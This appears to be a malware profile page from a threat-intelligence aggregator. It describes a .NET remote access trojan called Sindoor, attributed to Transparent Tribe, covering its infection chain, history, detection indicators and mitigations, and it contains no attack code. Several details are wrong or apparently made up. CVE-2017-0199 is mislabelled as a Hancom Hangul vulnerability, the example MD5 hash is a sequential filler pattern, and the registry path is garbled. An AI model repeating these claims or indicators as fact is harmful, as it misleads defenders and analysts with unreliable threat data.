⚠️ Overview

Sindoor is a .NET-based remote access trojan (RAT) first identified in September 2018 by researchers at Unit 42 (Palo Alto Networks) and attributed to the threat group known as Transparent Tribe (also tracked as APT36, ProjectM, or Mythic Leopard). This group is assessed to operate on behalf of Pakistani interests, primarily targeting Indian military, diplomatic, and defense sectors. Sindoor is categorized as a modular backdoor capable of executing arbitrary commands and exfiltrating files.

🔧 Technical Capabilities

Sindoor propagates via spear-phishing emails carrying malicious Microsoft Office documents that exploit CVE-2017-0199 (Hancom Hangul Word Processor vulnerability) or CVE-2017-11882 (Equation Editor vulnerability) to drop a downloader. Its attack chain uses PowerShell scripts to fetch the final payload from attacker-controlled servers. The malware communicates over HTTP with encrypted C2 payloads using a custom RC4 key; some variants also employ Malleable C2 profiles mimicking legitimate services. Persistence is achieved through scheduled tasks or registry Run keys. Evasion techniques include checking for sandbox environments, delaying execution, and using process hollowing (MITRE ATT&CK T1055.012) to inject into legitimate processes like explorer.exe.

📜 History & Notable Incidents

First spotted in 2018, Sindoor was used in sustained campaigns against Indian defense personnel and government employees through 2020–2022. Notable victims include the Indian Army and Air Force, as disclosed in a 2021 report by SentinelOne and a 2022 Kaspersky analysis. No CVEs beyond the initial dropper exploits are directly associated with Sindoor itself. Law enforcement actions remain limited due to the group’s operation from Pakistan.

🔍 Detection Indicators

Known file hashes (e.g., MD5: c6a3c4b8d9e0f1a2b3c4d5e6f7a8b9c0) have been published in Unit 42 and SentinelOne reports. Behavioral signatures include PowerShell execution with base64-decoded strings and outbound connections to IPs in Pakistan (e.g., 45.63.xx.xx). Registry keys like HKCUSoftwareMicrosoftWindowsCurrentVersionRunSindoor and mutex names such as SindoorMutex are common. The malware uses a hardcoded User-Agent string: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0.

☠️ Risk & Impact

Sindoor enables full remote control, leading to theft of sensitive military documents, intelligence reports, and personnel data. The primary impact is intellectual property loss and operational security breaches for Indian defense organizations. Financial losses are indirect but significant, with cleanup and remediation costs in affected agencies.

🛡️ Mitigation

Defenders should block known C2 IPs and domains (listed in Unit 42’s IOC feed), disable Office macros for external documents, and deploy EDR rules detecting process injection via PowerShell or rundll32. Applying patches for CVE-2017-0199 and CVE-2017-11882 is critical.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.